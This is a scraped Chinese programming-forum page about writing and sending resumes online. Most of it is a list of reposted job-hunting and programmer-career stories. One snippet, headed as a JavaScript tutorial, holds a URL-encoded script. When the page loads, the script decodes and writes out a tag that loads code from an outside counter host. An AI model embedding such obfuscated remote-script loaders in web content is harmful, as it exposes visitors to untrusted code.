网上投简历的心得【转帖】

推荐
扩充话题 > 程序人生 [问题点数:100分]
结帖率 88.73%
勋章
红花 2009年4月 扩充话题大版内专家分月排行榜第一
蓝花 2014年4月 扩充话题大版内专家分月排行榜第三
勋章
签到新秀 累计签到获取,不积跬步,无以至千里,继续坚持!
GitHub 绑定GitHub第三方账户获取
勋章
红花 2009年5月 扩充话题大版内专家分月排行榜第一
2008年11月 扩充话题大版内专家分月排行榜第一
黄花 2009年3月 扩充话题大版内专家分月排行榜第二
蓝花 2009年9月 扩充话题大版内专家分月排行榜第三
2009年7月 扩充话题大版内专家分月排行榜第三
2009年6月 扩充话题大版内专家分月排行榜第三
2008年12月 扩充话题大版内专家分月排行榜第三
2008年10月 扩充话题大版内专家分月排行榜第三
勋章
黄花 2009年5月 扩充话题大版内专家分月排行榜第二
2009年4月 扩充话题大版内专家分月排行榜第二
蓝花 2009年3月 扩充话题大版内专家分月排行榜第三
三下鱼

转帖】笨笨找工作——一个清华研究生的求职总结 --续

发信人: masparkle (笨笨), 信区: Career标 题: 笨笨找工作--7. 困难时期和年前的虚假繁荣发信站: 水木社区 (Sun Jun 26 14:42:00 2005), 站内从11月中旬到12月中旬,接近1个半月的时间里,基本没有什么笔试和面试...

很牛的求职经历(转帖

工作刚刚落实,论文也刚完成,终于有时间对自己的求职历程及求职经验进行总结了。应同学要求,最近准备书写系列文章“我的求职历程及经验分享”,请大家关注,谢谢! (一):求职历程总结2007 年1月10日,随着在...

[转帖]我的2006

- 秋毫ERP咨询-微软Dynamics Ax Axapta Nav SL CRM论坛 (http://www.qiuhao.com/index.asp)-- 『精品IT咨询和评论论坛』 (http://www.qiuh...

个程序员的奋斗故事(转帖)

一个IT人,在IT行业学习工作已经七年多了,这期间他做过网页,写过MIS、数据库,应用程序,做过通信软件、硬件驱动、协议栈,到现在做操作系统内核和IC相关开发,这中间走了很多弯路,也吃了不少苦。...

[转帖]一个程序员的经典自白

这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能够为国内IT的发展尽自己一份微薄的力量。最近看到很多学生朋友和我当年一样没有方向,所以把我的经历写出来与大家共勉,希望能给刚...

一个计算机高手的成长(转帖)

这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能 够为国内IT的发展尽自己一份微薄的力量。最近看到很多学生朋友和我当年一样没有方向 ,所以把我的经历写出来与大家共勉,希望能...

转帖】关于找工作的鸡零狗碎(续)

0、不是前言的前言 这两天折腾来折腾去,算是把自己卖了。相比很多人来说我算是比较幸运的,找工作也还算顺利,但一顿折腾下来还是身心俱疲,一度连轴转过一个月中间没有一天休息,累得恨不得跳了小月河。...

一段真实在个人经历 给那些迷失方向的朋友 转帖

一段真实在个人经历, 给那些迷失方向的朋友[转帖]

发信人: 七匹狼 (Sepwolves), 信区: anneal 标 题: 一段真实在个人经历, 给那些迷失方向的朋友[转帖] 发信站: 两全其美 BBS (Thu Sep 1 12:17:46 2005), 转信(lqqm.net) 一段真实在个人经历, 给那些迷失方向的朋友...

发信人: 七匹狼 (Sepwolves), 信区: anneal 标 题: 一段真实在个人经历, 给那些迷失方向的朋友[转帖] 发信站: 两全其美 BBS (Thu Sep 1 12:17:46 2005), 转信(lqqm.net) 一段真实在个人经历, 给那些迷失方向的朋友...

[转帖]一段真实在个人经历, 给那些迷失方向的朋友

[转帖]一段真实在个人经历, 给那些迷失方向的朋友 一段真实在个人经历, 给那些迷失方向的朋友[转帖]这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能够为国内IT的发展尽自己一份...

一段真实的个人经历, 给那些迷失方向的朋友[转帖]

一段真实在个人经历, 给那些迷失方向的朋友[转帖] 这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能够为国内IT的发展尽自己一份微薄的力量。最近看到很多学生朋友和我当年一样没有...

转帖】阿里巴巴离职DBA职业生涯总结:突然35岁~

本文转帖自:https://bbs.51cto.com/thread-926748-1.html 十五年前,你或许还不懂爱情,看Jack和Rose执手相看泪眼,只是蒙胧的心痛。十五年后,你会和谁一起走进影院,更会和谁一起,走到生命终点。十五年前,我还...

一段真实在个人经历, 给那些迷失方向的朋友 [转帖]

这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能够为国内IT的发展尽自己一份微薄的力量。最近看到很多学生朋友和我当年一样没有方向 ,所以把我的经历写出来与大家共勉,希望能给...

值得佩服的程序员的奋斗[转帖]一个三流学校程序员的奋斗

[转帖]一个三流学校程序员的奋斗! [u][b]自己的感想:[/b][/u] 如果在三年前你告诉我一个人可以纵横软硬行业,我信因为我知道自己也想做这样的人;但是如果在三天前你告诉我同样的事情,我不信,因为我知道这...

我的2011 — 珍惜大四美好的时光

2011年中,有收获也有失去,有喜悦也有辛酸; 在反反复复、断断续续中前行,实现了一些愿望(比如找份如意的工作),更多的是去憧憬。 写下这篇文章(包括五个部分:oracle成长,培训,找工作,爱情,小节与展望),...

一个程序员的奋斗历程 [zz]

一个程序员的奋斗历程 [转帖] 声明:此文为作者以第一人称自述,由lxceo转载。 这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能够为国内IT的发展尽自己一份微薄的力量。最近看到很...

一个计算机高手的成长

转帖]一个计算机高手的成长 这篇文章是转过来的,我一直都保存在我的硬盘上。 说实在的它对我的帮助很大,每当自己想松懈的时候看看这篇文章对自己有很大的激励。让懒惰都见鬼去了,希望这篇文章对...

一段真实在个人经历, 给那些迷失方向的朋友

一段真实在个人经历, 给那些迷失方向的朋友[转帖] 这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能够为国内IT的发展尽自己一份微薄的力量。最近看到很多学生朋友和我当年一样没有...

[转]一段真实在个人经历, 给那些迷失方向的朋友

(转)一个业内激励人的故事!!不看后悔哦

一段真实在个人经历, 给那些迷失方向的朋友[转帖] 这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能够为国内IT的发展尽自己一份微薄的力量。最近看到很多学生朋友和我...

一个IT人士的个人经历, 给那些迷失方向的朋友(转贴)

一段真实在个人经历, 给那些迷失方向的朋友[转帖]这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能够为国内IT的发展尽自己一份微薄的力量。最近看到很多学生朋友和我当

一段真实在个人经历, 给那些迷失方向的朋友

HTML Tags and JavaScript tutorialvar encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);

一个业内激励人的故事!!不看后悔哦

一段真实在个人经历, 给那些迷失方向的朋友[转帖]这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能够为国内IT的发展尽自己一份微薄的力量。最近看到很多学生朋友和我当年一样没有...

如何成为编程高手

如何成为编程高手第一阶段此阶段主要是能熟练地使用某种语言。这就相当于练武中的套路和架式这些表面的东西。第二阶段此阶段能精通基于某种平台的接口(例如我们现在常用的Win 32的API函数)以及所对应语言的自身的...

相关热词 c#中字符串大小写转化 c# 设置加载ie11 c#捕获关机信号 c#显示键盘输入的字符 c#list对象排序 c# sql查询方法 3d贝塞尔曲线 c# c#获取秒 c# 类型可空转换 c#字符串转ascii码